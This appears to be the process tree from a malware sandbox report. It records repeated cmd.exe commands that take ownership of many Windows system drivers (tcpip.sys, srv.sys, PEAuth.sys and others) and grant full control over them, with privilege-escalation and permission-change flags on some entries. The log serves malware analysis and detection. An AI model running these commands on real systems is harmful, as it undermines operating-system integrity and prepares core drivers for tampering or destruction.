C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:4548
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:4736
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"3⤵PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:4592
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵PID:4760
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:4600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:4612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"3⤵PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:4628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵PID:4840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4672
-
-
-
  - C:\Windows\System32\cmd.exe (PID 4680): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4860): takeown /f C:\Windows\System32\drivers\pciide.sys
    - C:\Windows\system32\icacls.exe (PID 4704): icacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4776): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4876): takeown /f C:\Windows\System32\drivers\pciidex.sys  [Possible privilege escalation attempt]
    - C:\Windows\system32\icacls.exe (PID 4964): icacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4744): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 5060): takeown /f C:\Windows\System32\drivers\pcmcia.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 5024): icacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4924): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 5036): takeown /f C:\Windows\System32\drivers\pcw.sys  [Possible privilege escalation attempt]
    - C:\Windows\system32\icacls.exe (PID 5100): icacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4936): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 3088): takeown /f C:\Windows\System32\drivers\PEAuth.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 3108): icacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4832): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 5012): takeown /f C:\Windows\System32\drivers\portcls.sys
    - C:\Windows\system32\icacls.exe (PID 3840): icacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"  [Possible privilege escalation attempt]
  - C:\Windows\System32\cmd.exe (PID 4928): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4172): takeown /f C:\Windows\System32\drivers\processr.sys
    - C:\Windows\system32\icacls.exe (PID 3888): icacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 3492): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4276): takeown /f C:\Windows\System32\drivers\ql2300.sys
    - C:\Windows\system32\icacls.exe (PID 3708): icacls C:\Windows\System32\drivers\ql2300.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 5080): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4156): takeown /f C:\Windows\System32\drivers\ql40xx.sys
    - C:\Windows\system32\icacls.exe (PID 4420): icacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4000): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 3164): takeown /f C:\Windows\System32\drivers\qwavedrv.sys
    - C:\Windows\system32\icacls.exe (PID 4472): icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 3272): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4228): takeown /f C:\Windows\System32\drivers\rasacd.sys
    - C:\Windows\system32\icacls.exe (PID 4100): icacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4252): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4340): takeown /f C:\Windows\System32\drivers\rasl2tp.sys
    - C:\Windows\system32\icacls.exe (PID 4324): icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4332): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4432): takeown /f C:\Windows\System32\drivers\raspppoe.sys
    - C:\Windows\system32\icacls.exe (PID 4684): icacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4416): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4492): takeown /f C:\Windows\System32\drivers\raspptp.sys
    - C:\Windows\system32\icacls.exe (PID 4460): icacls C:\Windows\System32\drivers\raspptp.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 3472): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4664): takeown /f C:\Windows\System32\drivers\rassstp.sys
    - C:\Windows\system32\icacls.exe (PID 4520): icacls C:\Windows\System32\drivers\rassstp.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4328): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4504): takeown /f C:\Windows\System32\drivers\rdbss.sys
    - C:\Windows\system32\icacls.exe (PID 4612): icacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4536): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4852): takeown /f C:\Windows\System32\drivers\rdpbus.sys
    - C:\Windows\system32\icacls.exe (PID 4980): icacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4780): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4944): takeown /f C:\Windows\System32\drivers\RDPCDD.sys
    - C:\Windows\system32\icacls.exe (PID 4984): icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"  [Possible privilege escalation attempt]
  - C:\Windows\System32\cmd.exe (PID 4556): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4716): takeown /f C:\Windows\System32\drivers\rdpdr.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 4756): icacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4892): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4564): takeown /f C:\Windows\System32\drivers\RDPENCDD.sys
    - C:\Windows\system32\icacls.exe (PID 3556): icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4656): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 2560): takeown /f C:\Windows\System32\drivers\RDPREFMP.sys
    - C:\Windows\system32\icacls.exe (PID 5044): icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4912): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 3832): takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys
    - C:\Windows\system32\icacls.exe (PID 4236): icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4952): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4172): takeown /f C:\Windows\System32\drivers\rdpwd.sys
    - C:\Windows\system32\icacls.exe (PID 5116): icacls C:\Windows\System32\drivers\rdpwd.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4824): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 5104): takeown /f C:\Windows\System32\drivers\rdyboost.sys
    - C:\Windows\system32\icacls.exe (PID 4216): icacls C:\Windows\System32\drivers\rdyboost.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 5076): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4276): takeown /f C:\Windows\System32\drivers\rmcast.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 4420): icacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4932): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4292): takeown /f C:\Windows\System32\drivers\RNDISMP.sys  [Possible privilege escalation attempt]
    - C:\Windows\system32\icacls.exe (PID 4100): icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "Admin:F"  [Possible privilege escalation attempt]
  - C:\Windows\System32\cmd.exe (PID 3888): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4388): takeown /f C:\Windows\System32\drivers\rootmdm.sys
    - C:\Windows\system32\icacls.exe (PID 4720): icacls C:\Windows\System32\drivers\rootmdm.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4156): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4452): takeown /f C:\Windows\System32\drivers\rspndr.sys
    - C:\Windows\system32\icacls.exe (PID 4208): icacls C:\Windows\System32\drivers\rspndr.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4408): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4732): takeown /f C:\Windows\System32\drivers\Rtnic64.sys
    - C:\Windows\system32\icacls.exe (PID 4304): icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4508): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4860): takeown /f C:\Windows\System32\drivers\sbp2port.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 4632): icacls C:\Windows\System32\drivers\sbp2port.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4376): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4960): takeown /f C:\Windows\System32\drivers\scfilter.sys
    - C:\Windows\system32\icacls.exe (PID 3556): icacls C:\Windows\System32\drivers\scfilter.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4500): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4316): takeown /f C:\Windows\System32\drivers\scsiport.sys
    - C:\Windows\system32\icacls.exe (PID 4276): icacls C:\Windows\System32\drivers\scsiport.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4436): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4564): takeown /f C:\Windows\System32\drivers\secdrv.sys
    - C:\Windows\system32\icacls.exe (PID 4856): icacls C:\Windows\System32\drivers\secdrv.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4396): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4488): takeown /f C:\Windows\System32\drivers\serenum.sys
    - C:\Windows\system32\icacls.exe (PID 3944): icacls C:\Windows\System32\drivers\serenum.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4880): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4624): takeown /f C:\Windows\System32\drivers\serial.sys
    - C:\Windows\system32\icacls.exe (PID 4864): icacls C:\Windows\System32\drivers\serial.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4968): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4688): takeown /f C:\Windows\System32\drivers\sermouse.sys
    - C:\Windows\system32\icacls.exe (PID 4412): icacls C:\Windows\System32\drivers\sermouse.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4544): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 3452): takeown /f C:\Windows\System32\drivers\sffdisk.sys
    - C:\Windows\system32\icacls.exe (PID 5084): icacls C:\Windows\System32\drivers\sffdisk.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4844): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 1444): takeown /f C:\Windows\System32\drivers\sffp_mmc.sys
    - C:\Windows\system32\icacls.exe (PID 4124): icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 5028): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4904): takeown /f C:\Windows\System32\drivers\sffp_sd.sys
    - C:\Windows\system32\icacls.exe (PID 4388): icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 5108): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4964): takeown /f C:\Windows\System32\drivers\sfloppy.sys
    - C:\Windows\system32\icacls.exe (PID 4524): icacls C:\Windows\System32\drivers\sfloppy.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4532): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4836): takeown /f C:\Windows\System32\drivers\sisraid2.sys
    - C:\Windows\system32\icacls.exe (PID 4724): icacls C:\Windows\System32\drivers\sisraid2.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4420): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4528): takeown /f C:\Windows\System32\drivers\sisraid4.sys
    - C:\Windows\system32\icacls.exe (PID 4148): icacls C:\Windows\System32\drivers\sisraid4.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4280): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4452): takeown /f C:\Windows\System32\drivers\smb.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 4232): icacls C:\Windows\System32\drivers\smb.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4304): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4676): takeown /f C:\Windows\System32\drivers\smclib.sys  [Possible privilege escalation attempt]
    - C:\Windows\system32\icacls.exe (PID 4288): icacls C:\Windows\System32\drivers\smclib.sys /grant "Admin:F"  [Modifies file permissions]
  - C:\Windows\System32\cmd.exe (PID 4048): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4584): takeown /f C:\Windows\System32\drivers\spldr.sys
    - C:\Windows\system32\icacls.exe (PID 5000): icacls C:\Windows\System32\drivers\spldr.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4960): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 3556): takeown /f C:\Windows\System32\drivers\spsys.sys
    - C:\Windows\system32\icacls.exe (PID 4840): icacls C:\Windows\System32\drivers\spsys.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4632): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4876): takeown /f C:\Windows\System32\drivers\srv.sys
    - C:\Windows\system32\icacls.exe (PID 4852): icacls C:\Windows\System32\drivers\srv.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4316): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4944): takeown /f C:\Windows\System32\drivers\srv2.sys
    - C:\Windows\system32\icacls.exe (PID 3832): icacls C:\Windows\System32\drivers\srv2.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4820): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4344): takeown /f C:\Windows\System32\drivers\srvnet.sys
    - C:\Windows\system32\icacls.exe (PID 4836): icacls C:\Windows\System32\drivers\srvnet.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 5100): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 1444): takeown /f C:\Windows\System32\drivers\stexstor.sys
    - C:\Windows\system32\icacls.exe (PID 4432): icacls C:\Windows\System32\drivers\stexstor.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4596): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 5096): takeown /f C:\Windows\System32\drivers\storport.sys
    - C:\Windows\system32\icacls.exe (PID 3352): icacls C:\Windows\System32\drivers\storport.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 5072): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4028): takeown /f C:\Windows\System32\drivers\storvsc.sys
    - C:\Windows\system32\icacls.exe (PID 4208): icacls C:\Windows\System32\drivers\storvsc.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 5116): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4572): takeown /f C:\Windows\System32\drivers\stream.sys
    - C:\Windows\system32\icacls.exe (PID 4244): icacls C:\Windows\System32\drivers\stream.sys /grant "Admin:F"  [Possible privilege escalation attempt]
  - C:\Windows\System32\cmd.exe (PID 4388): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4448): takeown /f C:\Windows\System32\drivers\swenum.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 5032): icacls C:\Windows\System32\drivers\swenum.sys /grant "Admin:F"  [Possible privilege escalation attempt]
  - C:\Windows\System32\cmd.exe (PID 4472): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4488): takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys  [Possible privilege escalation attempt; Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 4672): icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4444): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4704): takeown /f C:\Windows\System32\drivers\tape.sys
    - C:\Windows\system32\icacls.exe (PID 4688): icacls C:\Windows\System32\drivers\tape.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4564): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4840): takeown /f C:\Windows\System32\drivers\tcpip.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 4344): icacls C:\Windows\System32\drivers\tcpip.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4576): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4904): takeown /f C:\Windows\System32\drivers\tcpipreg.sys  [Modifies file permissions]
    - C:\Windows\system32\icacls.exe (PID 3944): icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4876): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 3856): takeown /f C:\Windows\System32\drivers\tdi.sys
    - C:\Windows\system32\icacls.exe (PID 5096): icacls C:\Windows\System32\drivers\tdi.sys /grant "Admin:F"
  - C:\Windows\System32\cmd.exe (PID 4404): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4964): takeown /f C:\Windows\System32\drivers\tdpipe.sys
    - C:\Windows\system32\icacls.exe (PID 5020): icacls C:\Windows\System32\drivers\tdpipe.sys /grant "Admin:F"  [Possible privilege escalation attempt]
  - C:\Windows\System32\cmd.exe (PID 4136): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit
    - C:\Windows\system32\takeown.exe (PID 4264): takeown /f C:\Windows\System32\drivers\tdtcp.sys  [Possible privilege escalation attempt]
    - C:\Windows\system32\icacls.exe (PID 4704): icacls C:\Windows\System32\drivers\tdtcp.sys /grant "Admin:F"
